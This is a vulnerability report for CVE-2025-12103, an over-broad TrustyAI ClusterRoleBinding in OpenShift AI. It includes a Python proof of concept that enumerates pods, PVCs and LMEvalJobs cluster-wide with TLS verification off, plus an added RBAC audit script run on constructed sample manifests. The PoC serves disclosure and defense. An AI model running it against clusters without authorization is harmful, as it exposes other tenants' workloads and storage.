Security Vulnerability Report
CVE-2025-12103 CVSS 5.0 MEDIUM

CVE-2025-12103

Published: 2025-10-28 14:15:56
Last Modified: 2026-04-23 18:16:23

Description

A flaw was found in Red Hat Openshift AI Service. The TrustyAI component grants all service accounts and users on a cluster permission to get, list, and watch any pod in any namespace on the cluster. TrustyAI creates a role `trustyai-service-operator-lmeval-user-role` and a ClusterRoleBinding (CRB) `trustyai-service-operator-default-lmeval-user-rolebinding` that is applied to `system:authenticated`, so every user or service account can list the pods running in any namespace on the cluster. Additionally, users can access all `persistentvolumeclaims` and `lmevaljobs`.

CVSS Details

CVSS Score
5.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Red Hat Openshift AI Service (TrustyAI component) - for the specific affected versions, refer to the Red Hat official advisory.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-12103 PoC - TrustyAI Excessive Permissions Exploitation
# This PoC demonstrates the excessive permissions granted by the TrustyAI component:
# each call below succeeds with any authenticated token because the
# trustyai-service-operator-default-lmeval-user-rolebinding CRB is bound to
# system:authenticated.
import requests

# Configuration: placeholders to be replaced with the cluster under authorized test
KUBERNETES_API = "https://<api-server>:6443"
TOKEN = "<your-service-account-token>"
HEADERS = {
    "Authorization": f"Bearer {TOKEN}",
    "Content-Type": "application/json",
}
# verify=False skips TLS verification of the API server (kept as in the original PoC);
# point it at the cluster CA bundle instead where one is available.
VERIFY_TLS = False


def list_all_pods():
    """List pods across all namespaces - excessive permission"""
    url = f"{KUBERNETES_API}/api/v1/pods"
    response = requests.get(url, headers=HEADERS, verify=VERIFY_TLS)
    if response.status_code == 200:
        pods = response.json()
        print(f"[+] Found {len(pods['items'])} pods across all namespaces")
        for pod in pods["items"][:5]:
            print(f"    Namespace: {pod['metadata']['namespace']}, Pod: {pod['metadata']['name']}")
    return response.status_code == 200


def list_all_pvcs():
    """List PersistentVolumeClaims across all namespaces"""
    url = f"{KUBERNETES_API}/api/v1/persistentvolumeclaims"
    response = requests.get(url, headers=HEADERS, verify=VERIFY_TLS)
    if response.status_code == 200:
        pvcs = response.json()
        print(f"[+] Found {len(pvcs['items'])} PVCs across all namespaces")
    return response.status_code == 200


def list_lmeval_jobs():
    """List LMEvalJobs custom resources (trustyai.opendatahub.io/v1alpha1)"""
    url = f"{KUBERNETES_API}/apis/trustyai.opendatahub.io/v1alpha1/lmevaljobs"
    response = requests.get(url, headers=HEADERS, verify=VERIFY_TLS)
    if response.status_code == 200:
        jobs = response.json()
        print(f"[+] Found {len(jobs['items'])} LMEvalJobs")
    return response.status_code == 200


if __name__ == "__main__":
    print("CVE-2025-12103 - TrustyAI Excessive Permissions PoC")
    print("=" * 50)
    list_all_pods()
    list_all_pvcs()
    list_lmeval_jobs()
```
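The defensive counterpart to the PoC is an RBAC audit: find ClusterRoleBindings that hand cluster-wide read access on pods, PVCs or LMEvalJobs to a group every principal belongs to, such as `system:authenticated`. The script below is an added example written for this report; it is not code from the advisory or from the TrustyAI project. It runs offline on constructed manifests shaped like `kubectl get clusterroles,clusterrolebindings -o json`: the object names are the ones the advisory quotes, but the rule bodies, the `example-*` objects and the `lmeval-runner` service account are assumptions made up for the sample.

```python
"""Audit Kubernetes RBAC for cluster-wide read access granted to broad groups,
the misconfiguration pattern described for CVE-2025-12103.

Added example, not part of the advisory or of the TrustyAI operator. The
SAMPLE_* data below is constructed; on a real cluster pass the `items` of
`kubectl get clusterroles -o json` and `kubectl get clusterrolebindings -o json`.
"""
import json
from typing import Dict, List

# Groups that every (or nearly every) principal on a cluster belongs to.
BROAD_GROUPS = {"system:authenticated", "system:unauthenticated", "system:serviceaccounts"}

# Resources the advisory names as exposed cluster-wide, and the verbs that
# allow enumerating them.
SENSITIVE_RESOURCES = {"pods", "persistentvolumeclaims", "lmevaljobs"}
READ_VERBS = {"get", "list", "watch", "*"}

# Constructed sample. Object names come from the advisory text; the rule
# bodies are an assumption about their shape, not copied from the operator.
SAMPLE_CLUSTERROLES = [
    {
        "metadata": {"name": "trustyai-service-operator-lmeval-user-role"},
        "rules": [
            {"apiGroups": [""], "resources": ["pods", "persistentvolumeclaims"],
             "verbs": ["get", "list", "watch"]},
            {"apiGroups": ["trustyai.opendatahub.io"], "resources": ["lmevaljobs"],
             "verbs": ["get", "list", "watch"]},
        ],
    },
    {
        # Constructed benign role: non-resource URLs only, nothing namespaced.
        "metadata": {"name": "example-discovery-role"},
        "rules": [{"nonResourceURLs": ["/version", "/healthz"], "verbs": ["get"]}],
    },
]
SAMPLE_CLUSTERROLEBINDINGS = [
    {
        "metadata": {"name": "trustyai-service-operator-default-lmeval-user-rolebinding"},
        "roleRef": {"kind": "ClusterRole", "name": "trustyai-service-operator-lmeval-user-role"},
        "subjects": [{"kind": "Group", "name": "system:authenticated"}],
    },
    {
        # Broad subject but harmless role: not a finding.
        "metadata": {"name": "example-discovery-binding"},
        "roleRef": {"kind": "ClusterRole", "name": "example-discovery-role"},
        "subjects": [{"kind": "Group", "name": "system:authenticated"}],
    },
    {
        # Same sensitive role bound to one service account: scoped, not a finding.
        "metadata": {"name": "example-scoped-binding"},
        "roleRef": {"kind": "ClusterRole", "name": "trustyai-service-operator-lmeval-user-role"},
        "subjects": [{"kind": "ServiceAccount", "name": "lmeval-runner", "namespace": "trustyai"}],
    },
]


def exposed_resources(role: Dict) -> List[str]:
    """Return the sensitive resources a role lets its holder get/list/watch."""
    found = []
    for rule in role.get("rules", []):
        if not set(rule.get("verbs", [])) & READ_VERBS:
            continue
        for res in rule.get("resources", []):
            if res == "*" or res in SENSITIVE_RESOURCES:
                found.append(res)
    return found


def audit_bindings(clusterroles: List[Dict], bindings: List[Dict]) -> List[Dict]:
    """Flag ClusterRoleBindings that give broad groups cluster-wide read access."""
    roles_by_name = {r["metadata"]["name"]: r for r in clusterroles}
    findings = []
    for crb in bindings:
        broad = [s["name"] for s in crb.get("subjects", [])
                 if s.get("kind") == "Group" and s["name"] in BROAD_GROUPS]
        if not broad:
            continue
        ref = crb["roleRef"]
        role = roles_by_name.get(ref["name"]) if ref.get("kind") == "ClusterRole" else None
        if role is None:
            continue
        resources = exposed_resources(role)
        if resources:
            findings.append({"binding": crb["metadata"]["name"], "role": ref["name"],
                             "subjects": broad, "resources": sorted(set(resources))})
    return findings


if __name__ == "__main__":
    for finding in audit_bindings(SAMPLE_CLUSTERROLES, SAMPLE_CLUSTERROLEBINDINGS):
        print(json.dumps(finding))
```

On the sample data the only finding is the `trustyai-service-operator-default-lmeval-user-rolebinding` binding, with `lmevaljobs`, `persistentvolumeclaims` and `pods` listed as exposed. A finding of this shape is the signal that a binding needs to be narrowed to the subjects that actually run evaluations rather than to `system:authenticated`; the same check also catches any other operator that binds a read-everything ClusterRole to a broad group.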

References

https://access.redhat.com/errata/RHSA-2025:21117
https://access.redhat.com/errata/RHSA-2026:10184
https://access.redhat.com/security/cve/CVE-2025-12103
https://bugzilla.redhat.com/show_bug.cgi?id=2405966
Raw JSON Data

```json
{"cve": {"id": "CVE-2025-12103", "sourceIdentifier": "[email protected]", "published": "2025-10-28T14:15:55.847", "lastModified": "2026-04-23T18:16:22.583", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Red Hat Openshift AI Service. The TrustyAI component is granting all service accounts and users on a cluster permissions to get, list, watch any pod in any namespace on the cluster.\n\nTrustyAI is creating a role `trustyai-service-operator-lmeval-user-role` and a CRB `trustyai-service-operator-default-lmeval-user-rolebinding` which is being applied to `system:authenticated` making it so that every single user or service account can get a list of pods running in any namespace on the cluster \n\nAdditionally users can access all `persistentvolumeclaims` and `lmevaljobs`"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2025:21117", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:10184", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-12103", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2405966", "source": "[email protected]"}]}}
```